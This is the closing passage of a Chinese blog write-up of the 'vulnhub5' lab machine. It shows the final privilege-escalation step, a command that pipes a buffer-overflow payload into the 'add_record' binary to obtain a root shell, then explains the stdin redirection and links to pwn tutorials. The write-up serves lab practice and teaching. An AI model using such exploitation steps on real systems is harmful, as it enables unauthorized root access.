<pre class=" language-bash"><code class="language-bash"><span class="token function">cat</span> payload - <span class="token operator">|</span> ./add_record
</code></pre>
<p>即可getshell，并且为root权限，短划线 <code>-</code>​ 表示将前一个命令的标准输出（在这种情况下是 “payload” 字符串）重定向到 .&#x2F;add_record 程序的标准输入，这样 .&#x2F;add_record 将从标准输入读取 “payload” 字符串</p>
<p>​<img src="/Blogimages/vulhub5/image-20231005100805-de6tdng.png" alt="image">​</p>
<h3 id="Pwn参考链接"><a href="#Pwn参考链接" class="headerlink" title="Pwn参考链接"></a>Pwn参考链接</h3><p><a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1Uv411j7fr/?spm_id_from=333.337.search-card.all.click&vd_source=4dbb58aa1f81a72a4d094fa71fd9907d">【星盟安全】PWN全集，从入门到精通，最通俗易懂的CTF，持续更新中_哔哩哔哩_bilibili</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_44108455/article/details/105115028">pwn学习—-定位溢出点位置_pwn 通过把编译 判断溢出位置-CSDN博客</a></p>
<p>‍</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a href="/categories/">分类</a></li>
        
          <li><a href="/%E5%8F%8B%E4%BA%BA%E9%93%BA/">友链</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#vulhub5"><span class="toc-number">1.</span> <span class="toc-text">vulhub5</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.1.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#getshell"><span class="toc-number">1.2.</span> <span class="toc-text">getshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87-1"><span class="toc-number">1.3.</span> <span class="toc-text">权限提升 1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87-2"><span class="toc-number">1.4.</span> <span class="toc-text">权限提升 2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Pwn%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-number">1.4.1.</span> <span class="toc-text">Pwn参考链接</span></a></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://qingfeng.tech/2023/10/08/vulnhub5/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://qingfeng.tech/2023/10/08/vulnhub5/&text=vulnhub5"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://qingfeng.tech/2023/10/08/vulnhub5/&title=vulnhub5"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://qingfeng.tech/2023/10/08/vulnhub5/&is_video=false&description=vulnhub5"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=vulnhub5&body=Check out this article: https://qingfeng.tech/2023/10/08/vulnhub5/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://qingfeng.tech/2023/10/08/vulnhub5/&title=vulnhub5"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://qingfeng.tech/2023/10/08/vulnhub5/&title=vulnhub5"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://qingfeng.tech/2023/10/08/vulnhub5/&title=vulnhub5"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://qingfeng.tech/2023/10/08/vulnhub5/&title=vulnhub5"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://qingfeng.tech/2023/10/08/vulnhub5/&name=vulnhub5&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://qingfeng.tech/2023/10/08/vulnhub5/&t=vulnhub5"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2022-2023
    清风
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/%E5%8F%8B%E4%BA%BA%E9%93%BA/">友链</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments --><!-- hexo-inject:begin --><!-- hexo-inject:end -->

</body>
</html>
